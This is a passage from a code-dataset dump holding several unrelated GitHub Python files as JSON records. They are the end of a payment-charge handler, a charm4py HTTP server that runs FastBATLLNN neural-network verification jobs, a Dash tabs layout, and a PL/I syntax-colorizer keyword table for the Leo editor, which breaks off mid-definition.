self.db.recv_charge(charge=form, cache_flag=cache_flag)\n self.log.info('charge is save OK')\n self.write('success')\n self.finish()\n return\n\n # # test charge\n # from test.test_action import test_charge\n # form = test_charge.form # 测试用的订单\n # cache_flag = self.get_cache_flag()\n # result = yield self.db.recv_charge(charge=form, cache_flag=cache_flag)\n # self.log.info('test charge is save OK')\n # self.write('test success')\n # self.finish()\n # return\n","repo_name":"screensme/take_job_demo","sub_path":"api/workplaceQA_handler.py","file_name":"workplaceQA_handler.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6122792748","text":"import numpy as np\nimport charm4py\nfrom charm4py import charm, Chare, coro, Reducer, Group, Future, Array, Channel\nimport TLLnetIO as TLLnet\nimport posetFastCharm\nimport TLLHypercubeReach\n\nimport time\nimport pickle\n\n# Server code from https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport logging\nimport json\n\nclass ShutdownServer(Exception):\n pass\n\ncharm.options.local_msg_buf_size = 10000\n# Enable profiling\ncharm.options.profiling = False\n\nclass Server(Chare):\n def __init__(self,processorRemote):\n\n toProcessorsChannel = Channel(self,processorRemote)\n fromProcessorsChannel = Channel(self,processorRemote)\n\n workingBase = [False]\n problem_setBase = [False]\n\n self.toProcessorsChannel = toProcessorsChannel\n self.fromProcessorsChannel = fromProcessorsChannel\n\n self.working = workingBase\n self.problem_set = problem_setBase\n\n class S(BaseHTTPRequestHandler):\n toProcChan = toProcessorsChannel\n fromProcChan = fromProcessorsChannel\n\n working = workingBase\n problem_set = problem_setBase\n\n def _set_response(self,content=None):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n if not content is None:\n self.wfile.write(content)\n # self.wfile.close()\n\n def do_GET(self):\n\n if not self.working[0] or not self.problem_set[0]:\n logging.info(\"GET request,\\nPath: %s\\nHeaders:\\n%s\\n\", str(self.path), str(self.headers))\n self._set_response()\n self.wfile.write(\"GET request for {}\".format(self.path).encode('utf-8'))\n else:\n result = self.fromProcChan.recv()\n dataContent = bytes(json.dumps(result,separators=(',', ':')), encoding='utf8')\n print(f'Sending {dataContent}')\n self._set_response(content=dataContent)\n self.working[0] = False\n self.problem_set[0] = False\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length']) # <--- Gets the size of data\n post_data = self.rfile.read(content_length) # <--- Gets the data itself\n data = json.loads(post_data.decode('utf-8'))\n logging.info(\"POST request,\\nPath: %s\\nHeaders:\\n%s\\n\\nBody:\\n%s\\n\",\n str(self.path), str(self.headers), data)\n\n self._set_response()\n self.wfile.write(\"POST request for {}\".format(self.path).encode('utf-8'))\n if 'COMMAND' in data:\n if data['COMMAND'] == 'NEW_PROBLEM':\n if not self.working[0]:\n self.toProcChan.send(data)\n self.problem_set[0] = True\n else:\n print('ERROR: recieved new problem before finishing with the last one')\n elif data['COMMAND'] == 'GO':\n print([self.problem_set[0],self.working[0]])\n if self.problem_set[0] and not self.working[0]:\n self.toProcChan.send(data)\n self.working[0] = True\n else:\n print('ERROR: no problem has been set yet')\n\n elif data['COMMAND'] == 'SHUTDOWN':\n self.toProcChan.send(data)\n raise KeyboardInterrupt()\n self.handler_class = S\n @coro\n def run(self,server_class=HTTPServer, port=8080):\n logging.basicConfig(level=logging.INFO)\n server_address = ('', port)\n httpd = server_class(server_address, self.handler_class)\n logging.info('Starting httpd...\\n')\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n logging.info('Stopping httpd...\\n')\n\ndef localLinToNumpy(localLinearFns):\n return [\n [ np.array(x,dtype=np.float64) for x in output ] for output in localLinearFns\n ]\n\ndef selectorsToSet(selectorSets):\n return [\n [ set(x) for x in output ] for output in selectorSets\n ]\n\nclass FastBATLLNNServer(Chare):\n\n def __init__(self,args):\n\n # Instantiate HTTP server\n serverTask = Chare(Server, args=[self.thisProxy], onPE=charm.numPes()-1)\n charm.awaitCreation(serverTask)\n # Create channels to/from HTTP server PE\n fromServerChannel = Channel(self,serverTask)\n toServerChannel = Channel(self,serverTask)\n\n # Instantiate FastBATLLNN\n pes = {'poset':[(0,charm.numPes()-1,1)],'hash':[(0,charm.numPes()-1,1)]}\n useQuery = False\n useBounding = False\n tllReach = Chare(TLLHypercubeReach.TLLHypercubeReach, args=[pes])\n charm.awaitCreation(tllReach)\n\n # Start listening for HTTP connnections\n serverDone = serverTask.run(awaitable=True)\n\n # Get the first command via HTTP\n msg = fromServerChannel.recv()\n\n timeout=300\n\n while msg and type(msg) is dict:\n\n if not 'COMMAND' in msg:\n # ignore this message, and get the next\n msg = fromServerChannel.recv()\n continue\n\n if msg['COMMAND'] == 'SHUTDOWN':\n toServerChannel.send({})\n break\n\n if msg['COMMAND'] == 'NEW_PROBLEM':\n\n validProc = True\n problemID = 'NULL'\n for k in ['A_in','b_in','A_out','b_out','n','N','M','m','localLinearFns','selectorSets','TLLFormatVersion','id']:\n if not k in msg:\n validProc = False\n\n # We got a valid new problem (more or less), so set things up to run FastBATLLNN\n if validProc:\n msg['localLinearFns'] = localLinToNumpy(msg['localLinearFns'])\n msg['selectorSets'] = selectorsToSet(msg['selectorSets'])\n for k in ['A_in', 'b_in']:\n msg[k] = np.array(msg[k],dtype=np.float64)\n\n tll = TLLnet.TLLnet.fromTLLFormat(msg)\n constraints = [msg['A_in'] , msg['b_in']]\n problemID = msg['id']\n A_out = msg['A_out']\n b_out = msg['b_out']\n\n\n # Now wait for either a \"GO\" or \"SHUTDOWN\" command\n msg = fromServerChannel.recv()\n while msg:\n if type(msg) is dict and 'COMMAND' in msg:\n if msg['COMMAND'] == 'SHUTDOWN' or msg['COMMAND'] == 'GO':\n break\n else:\n msg = fromServerChannel.recv()\n\n if msg['COMMAND'] == 'SHUTDOWN':\n toServerChannel.send({})\n break\n\n # If we got a GO command for some other problem, then return an invalid result\n if not 'id' in msg or msg['id'] != problemID:\n validProc = False\n if 'timeout' in msg:\n timeout = msg['timeout']\n # We recieved a GO command\n if not validProc:\n toServerChannel.send({'id':problemID,'RESULT':'INVALID'})\n else:\n # Here is where we will actually run FastBATLLNN\n tllReach.initialize(tll , constraints, 100, useQuery, awaitable=True).get()\n if A_out > 0:\n result = not bool(tllReach.verifyLB(b_out,timeout=(timeout if timeout > 0 else None),ret=True).get()) # verify NN >= a: True/1 == SAT; False/0 == UNSAT\n else:\n result = bool(tllReach.verifyUB(-b_out,timeout=(timeout if timeout > 0 else None),ret=True).get()) # verify NN <= b: True/1 == UNSAT; False/0 == SAT\n retDict = {'id':problemID,'RESULT':'sat' if result else 'unsat'}\n if result:\n ce = tllReach.getCounterExamplePoint(ret=True).get()\n if type(ce) is list and len(ce) == 2 and ce[0] is not None and ce[1] is not None:\n retDict['counterExample'] = ce[0].flatten().tolist()\n retDict['counterExampleVal'] = ce[1].flatten().tolist()\n toServerChannel.send(retDict)\n\n # Now wait for either a \"GO\" or \"SHUTDOWN\" command\n msg = fromServerChannel.recv()\n\n serverDone.get()\n\n charm.exit()\n\ncharm.start(FastBATLLNNServer,modules=['posetFastCharm','TLLHypercubeReach','DistributedHash'])\n\n","repo_name":"jferlez/FastBATLLNN","sub_path":"FastBATLLNNServer.py","file_name":"FastBATLLNNServer.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8010567912","text":"import dash_bootstrap_components as dbc\nfrom dash import html\n\n\ntab_today = dbc.Card(\n [\n html.P(\"Filter set to 'today'\",className=\"card-text\"),\n ],\n)\ntab_daily = dbc.Card(\n [\n html.P(\"Filter set to 'daily'\",className=\"card-text\"),\n ]\n)\ntab_weekly = dbc.Card(\n [\n html.P(\"Filter set to 'weekly'\",className=\"card-text\"),\n ]\n)\ntab_monthly = dbc.Card(\n [\n html.P(\"Filter set to 'monthly'\",className=\"card-text\"),\n ]\n)\ntab_total = dbc.Card(\n [\n html.P(\"Filter set to 'total'\",className=\"card-text\"),\n ]\n)\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(tab_today, label=\"today\", tab_id='tab-today'),\n dbc.Tab(tab_daily, label=\"daily\", tab_id='tab-daily'),\n dbc.Tab(tab_weekly, label=\"weekly\", tab_id='tab-weekly'),\n dbc.Tab(tab_monthly, label=\"monthly\", tab_id='tab-monthly'),\n dbc.Tab(tab_total, label=\"total\", tab_id='tab-total'),\n ],\n id='tabs',\n active_tab=\"tab-today\",\n className=\"nav-fill\"\n)","repo_name":"Anonymous5726221/lapalma_data","sub_path":"app/components/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8155418941","text":"# Leo colorizer control file for pl1 mode.\r\n# This file is in the public domain.\r\n\r\n# Properties for pl1 mode.\r\nproperties = {\r\n \"commentEnd\": \"*/\",\r\n \"commentStart\": \"/*\",\r\n \"wordBreakChars\": \",+-=<>/?^&*\",\r\n}\r\n\r\n# Attributes dict for pl1_main ruleset.\r\npl1_main_attributes_dict = {\r\n \"default\": \"null\",\r\n \"digit_re\": \"\",\r\n \"escape\": \"\\\\\",\r\n \"highlight_digits\": \"false\",\r\n \"ignore_case\": \"true\",\r\n \"no_word_sep\": \"\",\r\n}\r\n\r\n# Dictionary of attributes dictionaries for pl1 mode.\r\nattributesDictDict = {\r\n \"pl1_main\": pl1_main_attributes_dict,\r\n}\r\n\r\n# Keywords dict for pl1_main ruleset.\r\npl1_main_keywords_dict = {\r\n \"%include\": \"keyword1\",\r\n \"a\": \"keyword2\",\r\n \"abnormal\": \"keyword2\",\r\n \"abs\": \"keyword3\",\r\n \"acos\": \"keyword3\",\r\n \"acosf\": \"keyword3\",\r\n \"add\": \"keyword3\",\r\n \"addr\": \"keyword3\",\r\n \"addrdata\": \"keyword3\",\r\n \"address\": \"keyword3\",\r\n \"alias\": \"keyword1\",\r\n \"aligned\": \"keyword2\",\r\n \"all\": \"keyword3\",\r\n \"alloc\": \"keyword1\",\r\n \"allocate\": \"keyword1\",\r\n \"allocation\": \"keyword3\",\r\n \"allocn\": \"keyword3\",\r\n \"allocsize\": \"keyword3\",\r\n \"any\": \"keyword3\",\r\n \"anycond\": \"keyword2\",\r\n \"anycondition\": \"keyword2\",\r\n \"area\": \"keyword2\",\r\n \"asgn\": \"keyword2\",\r\n \"asin\": \"keyword3\",\r\n \"asinf\": \"keyword3\",\r\n \"asm\": \"keyword2\",\r\n \"assembler\": \"keyword2\",\r\n \"assignable\": \"keyword2\",\r\n \"atan\": \"keyword3\",\r\n \"atand\": \"keyword3\",\r\n \"atanf\": \"keyword3\",\r\n \"atanh\": \"keyword3\",\r\n \"attach\": \"keyword1\",\r\n \"attention\": \"keyword2\",\r\n \"attn\": \"keyword2\",\r\n \"auto\": \"keyword2\",\r\n \"automatic\": \"keyword2\",\r\n \"availablearea\": \"keyword3\",\r\n \"b\": \"keyword2\",\r\n \"b3\": \"keyword2\",\r\n \"b4\": \"keyword2\",\r\n \"based\": \"keyword2\",\r\n \"begin\": \"keyword1\",\r\n \"bigendian\": \"keyword2\",\r\n \"bin\": \"keyword2\",\r\n \"binary\": \"keyword2\",\r\n \"binaryvalue\": \"keyword3\",\r\n \"bind\": \"keyword3\",\r\n \"binvalue\": \"keyword3\",\r\n \"bit\": \"keyword2\",\r\n \"bitloc\": \"keyword3\",\r\n \"bitlocation\": \"keyword3\",\r\n \"bool\": \"keyword3\",\r\n \"buf\": \"keyword2\",\r\n \"buffered\": \"keyword2\",\r\n \"builtin\": \"keyword2\",\r\n \"bx\": \"keyword2\",\r\n \"by\": \"keyword1\",\r\n \"byaddr\": \"keyword2\",\r\n \"byname\": \"keyword1\",\r\n \"byte\": \"keyword3\",\r\n \"byvalue\": \"keyword2\",\r\n \"c\": \"keyword2\",\r\n \"call\": \"keyword1\",\r\n \"cast\": \"keyword3\",\r\n \"cdecl\": \"keyword2\",\r\n \"cds\": \"keyword3\",\r\n \"ceil\": \"keyword3\",\r\n \"cell\": \"keyword2\",\r\n \"center\": \"keyword3\",\r\n \"centerright\": \"keyword3\",\r\n \"centre\": \"keyword3\",\r\n \"centreleft\": \"keyword3\",\r\n \"centreright\": \"keyword3\",\r\n \"char\": \"keyword2\",\r\n \"character\": \"keyword2\",\r\n \"charg\": \"keyword3\",\r\n \"chargraphic\": \"keyword3\",\r\n \"chargval\": \"keyword3\",\r\n \"checkstg\": \"keyword3\",\r\n \"close\": \"keyword1\",\r\n \"cobol\": \"keyword2\",\r\n \"collate\": \"keyword3\",\r\n \"column\": \"keyword2\",\r\n \"compare\": \"keyword3\",\r\n \"complex\": \"keyword2\",\r\n \"cond\": \"keyword2\",\r\n \"condition\": \"keyword2\",\r\n \"conjg\": \"keyword3\",\r\n \"conn\": \"keyword2\",\r\n \"connected\": \"keyword2\",\r\n \"controlled\": \"keyword2\",\r\n \"conv\": \"keyword2\",\r\n \"conversion\": \"keyword2\",\r\n \"copy\": \"keyword1\",\r\n \"cos\": \"keyword3\",\r\n \"cosd\": \"keyword3\",\r\n \"cosf\": \"keyword3\",\r\n \"cosh\": \"keyword3\",\r\n \"count\": \"keyword3\",\r\n \"cplx\": \"keyword2\",\r\n \"cs\": \"keyword3\",\r\n \"cstg\": \"keyword3\",\r\n \"ctl\": \"keyword2\",\r\n \"currentsize\": \"keyword3\",\r\n \"currentstorage\": \"keyword3\",\r\n \"data\": \"keyword2\",\r\n \"datafield\": \"keyword3\",\r\n \"date\": \"keyword3\",\r\n \"datetime\": \"keyword3\",\r\n \"days\": \"keyword3\",\r\n \"daystodate\": \"keyword3\",\r\n \"daystosecs\": \"keyword3\",\r\n \"dcl\": \"keyword1\",\r\n \"dec\": \"keyword2\",\r\n \"decimal\": \"keyword2\",\r\n \"declare\": \"keyword1\",\r\n \"def\": \"keyword2\",\r\n \"default\": \"keyword1\",\r\n \"define\": \"keyword1\",\r\n \"defined\": \"keyword2\",\r\n \"delay\": \"keyword1\",\r\n \"delete\": \"keyword1\",\r\n \"descriptor\": \"keyword2\",\r\n \"descriptors\": \"keyword2\",\r\n \"detach\": \"keyword1\",\r\n \"dft\": \"keyword1\",\r\n \"dim\": \"keyword2\",\r\n \"dimension\": \"keyword2\",\r\n \"direct\": \"keyword2\",\r\n \"display\": \"keyword1\",\r\n \"divide\": \"keyword3\",\r\n \"do\": \"keyword1\",\r\n \"downthru\": \"keyword1\",\r\n \"e\": \"keyword2\",\r\n \"edit\": \"keyword2\",\r\n \"else\": \"keyword1\",\r\n \"empty\": \"keyword3\",\r\n \"end\": \"keyword1\",\r\n \"endfile\": \"keyword2\",\r\n \"endpage\": \"keyword2\",\r\n \"entry\": \"keyword1\",\r\n \"entryaddr\": \"keyword3\",\r\n \"env\": \"keyword2\",\r\n \"environment\": \"keyword2\",\r\n \"epsilon\": \"keyword3\",\r\n \"erfc\": \"keyword3\",\r\n \"error\": \"keyword2\",\r\n \"exclusive\": \"keyword2\",\r\n \"exit\": \"keyword1\",\r\n \"exp\": \"keyword3\",\r\n \"expf\": \"keyword3\",\r\n \"exponent\": \"keyword3\",\r\n \"exports\": \"keyword2\",\r\n \"ext\": \"keyword2\",\r\n \"external\": \"keyword2\",\r\n \"f\": \"keyword2\",\r\n \"fetch\": \"keyword1\",\r\n \"fetchable\": \"keyword2\",\r\n \"file\": \"keyword2\",\r\n \"fileddint\": \"keyword3\",\r\n \"fileddtest\": \"keyword3\",\r\n \"fileddword\": \"keyword3\",\r\n \"fileid\": \"keyword3\",\r\n \"fileopen\": \"keyword3\",\r\n \"fileread\": \"keyword3\",\r\n \"fileseek\": \"keyword3\",\r\n \"filetell\": \"keyword3\",\r\n \"filewrite\": \"keyword3\",\r\n \"finish\": \"keyword2\",\r\n \"first\": \"keyword3\",\r\n \"fixed\": \"keyword2\",\r\n \"fixedoverflow\": \"keyword2\",\r\n \"float\": \"keyword2\",\r\n \"floor\": \"keyword3\",\r\n \"flush\": \"keyword1\",\r\n \"fofl\": \"keyword2\",\r\n \"format\": \"keyword2\",\r\n \"fortran\": \"keyword2\",\r\n \"free\": \"keyword1\",\r\n \"from\": \"keyword1\",\r\n \"fromalien\": \"keyword2\",\r\n \"g\": \"keyword2\",\r\n \"gamma\": \"keyword3\",\r\n \"generic\": \"keyword2\",\r\n \"get\": \"keyword1\",\r\n \"getenv\": \"keyword3\",\r\n \"go\": \"keyword1\",\r\n \"goto\": \"keyword1\",\r\n \"graphic\": \"keyword2\",\r\n \"gx\": \"keyword2\",\r\n \"handle\": \"keyword2\",\r\n \"hbound\": \"keyword3\",\r\n \"hex\": \"keyword3\",\r\n \"hexadec\": \"keyword2\",\r\n \"heximage\": \"keyword3\",\r\n \"high\": \"keyword3\",\r\n \"huge\": \"keyword3\",\r\n \"iand\": \"keyword3\",\r\n \"ieee\": \"keyword2\",\r\n \"ieor\": \"keyword3\",\r\n \"if\": \"keyword1\",\r\n \"ignore\": \"keyword1\",\r\n \"imag\": \"keyword3\",\r\n \"imported\": \"keyword2\",\r\n \"index\": \"keyword3\",\r\n \"init\": \"keyword2\",\r\n \"initial\": \"keyword2\",\r\n \"inline\": \"keyword2\",\r\n \"inot\": \"keyword3\",\r\n \"input\": \"keyword2\",\r\n \"inter\": \"keyword2\",\r\n \"internal\": \"keyword2\",\r\n \"into\": \"keyword1\",\r\n \"invalidop\": \"keyword2\",\r\n \"ior\": \"keyword3\",\r\n \"irred\": \"keyword2\",\r\n \"irreducible\": \"keyword2\",\r\n \"isigned\": \"keyword3\",\r\n \"isll\": \"keyword3\",\r\n \"ismain\": \"keyword3\",\r\n \"isrl\": \"keyword3\",\r\n \"iterate\": \"keyword1\",\r\n \"iunsigned\": \"keyword3\",\r\n \"key\": \"keyword1\",\r\n \"keyed\": \"keyword2\",\r\n \"keyfrom\": \"keyword1\",\r\n \"keyto\": \"keyword1\",\r\n \"l\": \"keyword2\",\r\n \"label\": \"keyword2\",\r\n \"last\": \"keyword3\",\r\n \"lbound\": \"keyword3\",\r\n \"leave\": \"keyword1\",\r\n \"left\": \"keyword3\",\r\n \"length\": \"keyword3\",\r\n \"like\": \"keyword2\",\r\n \"limited\": \"keyword2\",\r\n \"line\": \"keyword1\",\r\n \"lineno\": \"keyword3\",\r\n \"linesize\": \"keyword2\",\r\n \"linkage\": \"keyword2\",\r\n \"list\": \"keyword2\",\r\n \"littleendian\": \"keyword2\",\r\n \"loc\": \"keyword3\",\r\n \"locate\": \"keyword1\",\r\n \"location\": \"keyword3\",\r\n \"log\": \"keyword3\",\r\n \"log10\": \"keyword3\",\r\n \"log10f\": \"keyword3\",\r\n \"log2\": \"keyword3\",\r\n \"logf\": \"keyword3\",\r\n \"loggamma\": \"keyword3\",\r\n \"loop\": \"keyword1\",\r\n \"low\": \"keyword3\",\r\n \"lower2\": \"keyword3\",\r\n \"lowercase\": \"keyword3\",\r\n \"m\": \"keyword2\",\r\n \"main\": \"keyword2\",\r\n \"max\": \"keyword3\",\r\n \"maxexp\": \"keyword3\",\r\n \"maxlength\": \"keyword3\",\r\n \"min\": \"keyword3\",\r\n \"minexp\": \"keyword3\",\r\n \"mod\": \"keyword3\",\r\n \"mpstr\": \"keyword3\",\r\n \"multiply\": \"keyword3\",\r\n \"name\": \"keyword1\",\r\n \"native\": \"keyword2\",\r\n \"new\": \"keyword3\",\r\n \"nocharg\": \"keyword2\",\r\n \"nochargraphic\": \"keyword2\",\r\n \"nodescriptor\": \"keyword2\",\r\n \"noexecops\": \"keyword2\",\r\n \"nomap\": \"keyword2\",\r\n \"nomapin\": \"keyword2\",\r\n \"nomapout\": \"keyword2\",\r\n \"nonasgn\": \"keyword2\",\r\n \"nonassignable\": \"keyword2\",\r\n \"nonconn\": \"keyword2\",\r\n \"nonconnected\": \"keyword2\",\r\n \"nonnative\": \"keyword2\",\r\n \"nonvar\": \"keyword2\",\r\n \"nonvarying\": \"keyword2\",\r\n \"normal\": \"keyword2\",\r\n \"null\": \"keyword3\",\r\n \"offestadd\": \"keyword3\",\r\n \"offestdiff\": \"keyword3\",\r\n \"offestsubtract\": \"keyword3\",\r\n \"offestvalue\": \"keyword3\",\r\n \"offset\": \"keyword2\",\r\n \"ofl\": \"keyword2\",\r\n \"omitted\": \"keyword3\",\r\n \"on\": \"keyword1\",\r\n \"onchar\": \"keyword3\",\r\n \"oncode\": \"keyword3\",\r\n \"oncondid\": \"keyword3\",\r\n \"oncondond\": \"keyword3\",\r\n \"oncount\": \"keyword3\",\r\n \"onfile\": \"keyword3\",\r\n \"ongsource\": \"keyword3\",\r\n \"onkey\": \"keyword3\",\r\n \"onloc\": \"keyword3\",\r\n \"onsource\": \"keyword3\",\r\n \"onsubcode\": \"keyword3\",\r\n \"onwchar\": \"keyword3\",\r\n \"onwsource\": \"keyword3\",\r\n \"open\": \"keyword1\",\r\n \"optional\": \"keyword2\",\r\n \"options\": \"keyword2\",\r\n \"optlink\": \"keyword2\",\r\n \"order\": \"keyword2\",\r\n \"ordinal\": \"keyword1\",\r\n \"ordinalname\": \"keyword3\",\r\n \"ordinalpred\": \"keyword3\",\r\n \"ordinalsucc\": \"keyword3\",\r\n \"other\": \"keyword1\",\r\n \"otherwise\": \"keyword1\",\r\n \"output\": \"keyword2\",\r\n \"overflow\": \"keyword2\",\r\n \"p\": \"keyword2\",\r\n \"package\": \"keyword1\",\r\n \"packagename\": \"keyword3\",\r\n \"page\": \"keyword1\",\r\n \"pageno\": \"keyword3\",\r\n \"pagesize\": \"keyword2\",\r\n \"parameter\": \"keyword2\",\r\n \"pic\": \"keyword2\",\r\n \"picture\": \"keyword2\",\r\n \"places\": \"keyword3\",\r\n \"plianc\": \"keyword3\",\r\n \"pliascii\": \"keyword3\",\r\n \"plickpt\": \"keyword3\",\r\n \"plidelete\": \"keyword3\",\r\n \"plidump\": \"keyword3\",\r\n \"pliebcdic\": \"keyword3\",\r\n \"plifill\": \"keyword3\",\r\n \"plifree\": \"keyword3\",\r\n \"plimove\": \"keyword3\",\r\n \"pliover\": \"keyword3\",\r\n \"plirest\": \"keyword3\",\r\n \"pliretc\": \"keyword3\",\r\n \"pliretv\": \"keyword3\",\r\n \"plisaxa\": \"keyword3\",\r\n \"plisaxb\": \"keyword3\",\r\n \"plisrta\": \"keyword3\",\r\n \"plisrtb\": \"keyword3\",\r\n \"plisrtc\": \"keyword3\",\r\n \"plisrtd\": \"keyword3\",\r\n \"pointer\": \"keyword2\",\r\n \"pointeradd\": \"keyword3\",\r\n \"pointerdiff\": \"keyword3\",\r\n \"pointersubtract\": \"keyword3\",\r\n \"pointervalue\": \"keyword3\",\r\n \"poly\": \"keyword3\",\r\n \"pos\": \"keyword2\",\r\n \"position\": \"keyword2\",\r\n \"prec\": \"keyword2\",\r\n \"precision\": \"keyword2\",\r\n \"pred\": \"keyword3\",\r\n \"present\": \"keyword3\",\r\n \"print\": \"keyword2\",\r\n \"proc\": \"keyword1\",\r\n \"procedure\": \"keyword1\",\r\n \"procedurename\": \"keyword3\",\r\n \"procname\": \"keyword3\",\r\n \"prod\": \"keyword3\",\r\n \"ptr\": \"keyword2\",\r\n \"ptradd\": \"keyword3\",\r\n \"ptrdiff\": \"keyword3\",\r\n \"ptrsubtract\": \"keyword3\",\r\n \"ptrvalue\": \"keyword3\",\r\n \"put\": \"keyword1\",\r\n \"putenv\": \"keyword3\",\r\n \"r\": \"keyword2\",\r\n \"radix\": \"keyword3\",\r\n \"raise\": \"keyword3\",\r\n \"random\": \"keyword3\",\r\n \"range\": \"keyword2\",\r\n \"rank\": \"keyword3\",\r\n \"read\": \"keyword1\",\r\n \"real\": \"keyword2\",\r\n \"record\": \"keyword2\",\r\n \"recursive\": \"keyword2\",\r\n \"red\": \"keyword2\",\r\n \"reducible\": \"keyword2\",\r\n \"reentrant\": \"keyword2\",\r\n \"refer\": \"keyword2\",\r\n \"release\": \"keyword1\",\r\n \"rem\": \"keyword3\",\r\n \"reorder\": \"keyword2\",\r\n \"repattern\": \"keyword3\",\r\n \"repeat\": \"keyword1\",\r\n \"reply\": \"keyword1\",\r\n \"reserved\": \"keyword2\",\r\n \"reserves\": \"keyword2\",\r\n \"resignal\": \"keyword1\",\r\n \"respec\": \"keyword3\",\r\n \"retcode\": \"keyword2\",\r\n \"return\": \"keyword1\",\r\n \"returns\": \"keyword2\",\r\n \"reverse\": \"keyword3\",\r\n \"revert\": \"keyword1\",\r\n \"rewrite\": \"keyword1\",\r\n \"right\": \"keyword3\",\r\n \"round\": \"keyword3\",\r\n \"samekey\": \"keyword3\",\r\n \"scale\": \"keyword3\",\r\n \"search\": \"keyword3\",\r\n \"searchr\": \"keyword3\",\r\n \"secs\": \"keyword3\",\r\n \"secstodate\": \"keyword3\",\r\n \"secstodays\": \"keyword3\",\r\n \"select\": \"keyword1\",\r\n \"seql\": \"keyword2\",\r\n \"sequential\": \"keyword2\",\r\n \"set\": \"keyword1\",\r\n \"sign\": \"keyword3\",\r\n \"signal\": \"keyword1\",\r\n \"signed\": \"keyword3\",\r\n \"sin\": \"keyword3\",\r\n \"sind\": \"keyword3\",\r\n \"sinf\": \"keyword3\",\r\n \"sinh\": \"keyword3\",\r\n \"size\": \"keyword3\",\r\n \"skip\": \"keyword1\",\r\n \"snap\": \"keyword1\",\r\n \"sourcefile\": \"keyword3\",\r\n \"sourceline\": \"keyword3\",\r\n \"sqrt\": \"keyword3\",\r\n \"sqrtf\": \"keyword3\",\r\n \"static\": \"keyword2\",\r\n \"stdcall\": \"keyword2\",\r\n \"stg\": \"keyword3\",\r\n \"stop\": \"keyword1\",\r\n \"storage\": \"keyword3\",\r\n \"stream\": \"keyword2\",\r\n \"strg\": \"keyword2\",\r\n \"string\": \"keyword3\",\r\n \"stringrange\": \"keyword2\",\r\n \"stringsize\": \"keyword2\",\r\n \"structure\": \"keyword1\",\r\n \"strz\": \"keyword2\",\r\n \"subrg\": \"keyword2\",\r\n \"subscriptrange\": \"keyword2\",\r\n \"substr\": \"keyword3\",\r\n \"subtract\": \"keyword3\",\r\n \"succ\": \"keyword3\",\r\n \"sum\": \"keyword3\",\r\n \"sysnull\": \"keyword3\",\r\n \"system\": \"keyword2\",\r\n \"tally\": \"keyword3\",\r\n \"tan\": \"keyword3\",\r\n \"tand\": \"keyword3\",\r\n \"tanf\": \"keyword3\",\r\n \"tanh\": \"keyword3\",\r\n \"task\": \"keyword2\",\r\n \"then\": \"keyword1\",\r\n \"thread\": \"keyword1\",\r\n \"threadid\": \"keyword3\",\r\n \"time\": \"keyword3\",\r\n \"tiny\": \"keyword3\",\r\n \"title\": \"keyword2\",\r\n \"to\": \"keyword1\",\r\n \"translate\": \"keyword3\",\r\n \"transmit\": \"keyword2\",\r\n \"trim\": \"keyword3\",\r\n \"trunc\": \"keyword3\",\r\n \"tstack\": \"keyword1\",\r\n \"type\": \"keyword3\",\r\n \"ufl\": \"keyword2\",\r\n \"unal\": \"keyword2\",\r\n \"unaligned\": \"keyword2\",\r\n \"unallocated\": \"keyword3\",\r\n \"unbuf\": \"keyword2\",\r\n \"unbuffered\": \"keyword2\",\r\n \"undefinedfile\": \"keyword2\",\r\n \"underflow\": \"keyword2\",\r\n \"undf\": \"keyword2\",\r\n \"union\": \"keyword2\",\r\n \"unlock\": \"keyword1\",\r\n \"unsigned\": \"keyword2\",\r\n \"unspec\": \"keyword3\",\r\n \"until\": \"keyword1\",\r\n \"update\": \"keyword2\",\r\n \"uppercase\": \"keyword3\",\r\n \"upthru\": \"keyword1\",\r\n \"valid\": \"keyword3\",\r\n \"validdate\": \"keyword3\",\r\n \"value\": \"keyword2\",\r\n \"var\": \"keyword2\",\r\n \"varglist\": \"keyword3\",\r\n \"vargsizer\": \"keyword3\",\r\n \"variable\": \"keyword2\",\r\n \"varying\": \"keyword2\",\r\n \"varyingz\": \"keyword2\",\r\n \"varz\": \"keyword2\",\r\n \"verify\": \"keyword3\",\r\n \"verifyr\": \"keyword3\",\r\n \"wait\": \"keyword1\",\r\n \"wchar\": \"keyword2\",\r\n \"wcharval\": \"keyword3\",\r\n \"weekday\": \"keyword3\",\r\n \"when\": \"keyword1\",\r\n \"whigh\": \"keyword3\",\r\n \"while\": \"keyword1\",\r\n \"widechar\": \"keyword2\",\r\n \"winmain\": \"keyword2\",\r\n \"wlow\": \"keyword3\",\r\n \"write\": \"keyword1\",\r\n \"wx\": \"keyword2\",\r\n \"x\": \"keyword2\",\r\n \"xn\": \"keyword2\",\r\n \"xu\": \"keyword2\",\r\n \"y4date\": \"keyword3\",\r\n \"y4julian\": \"keyword3\",\r\n \"y4year\": \"keyword3\",\r\n \"zdiv\": \"keyword2\",\r\n \"zerodivide\": \"keyword2\",\r\n}\r\n\r\n# Dictionary of keywords dictionaries for pl1 mode.\r\nkeywordsDictDict = {\r\n \"pl1_main\": pl1_main_keywords_dict,\r\n}\r\n\r\n# Rules for pl1_main ruleset.\r\n\r\ndef pl1_rule0(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"comment1\", begin=\"/*\", end=\"*/\")\r\n\r\ndef pl1_rule1(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"literal1\", begin=\"'\", end=\"'\")\r\n\r\ndef pl1_rule2(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"literal1\", begin=\"\\\"\", end=\"\\\"\")\r\n\r\ndef pl1_rule3(colorer, s, i):\r\n return colorer.match_eol_span_regexp(s, i, kind=\"keyword2\", regexp=\"\\\\* *process\",\r\n at_line_start=True)\r\n\r\ndef pl1_rule4(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"=\")\r\n\r\ndef 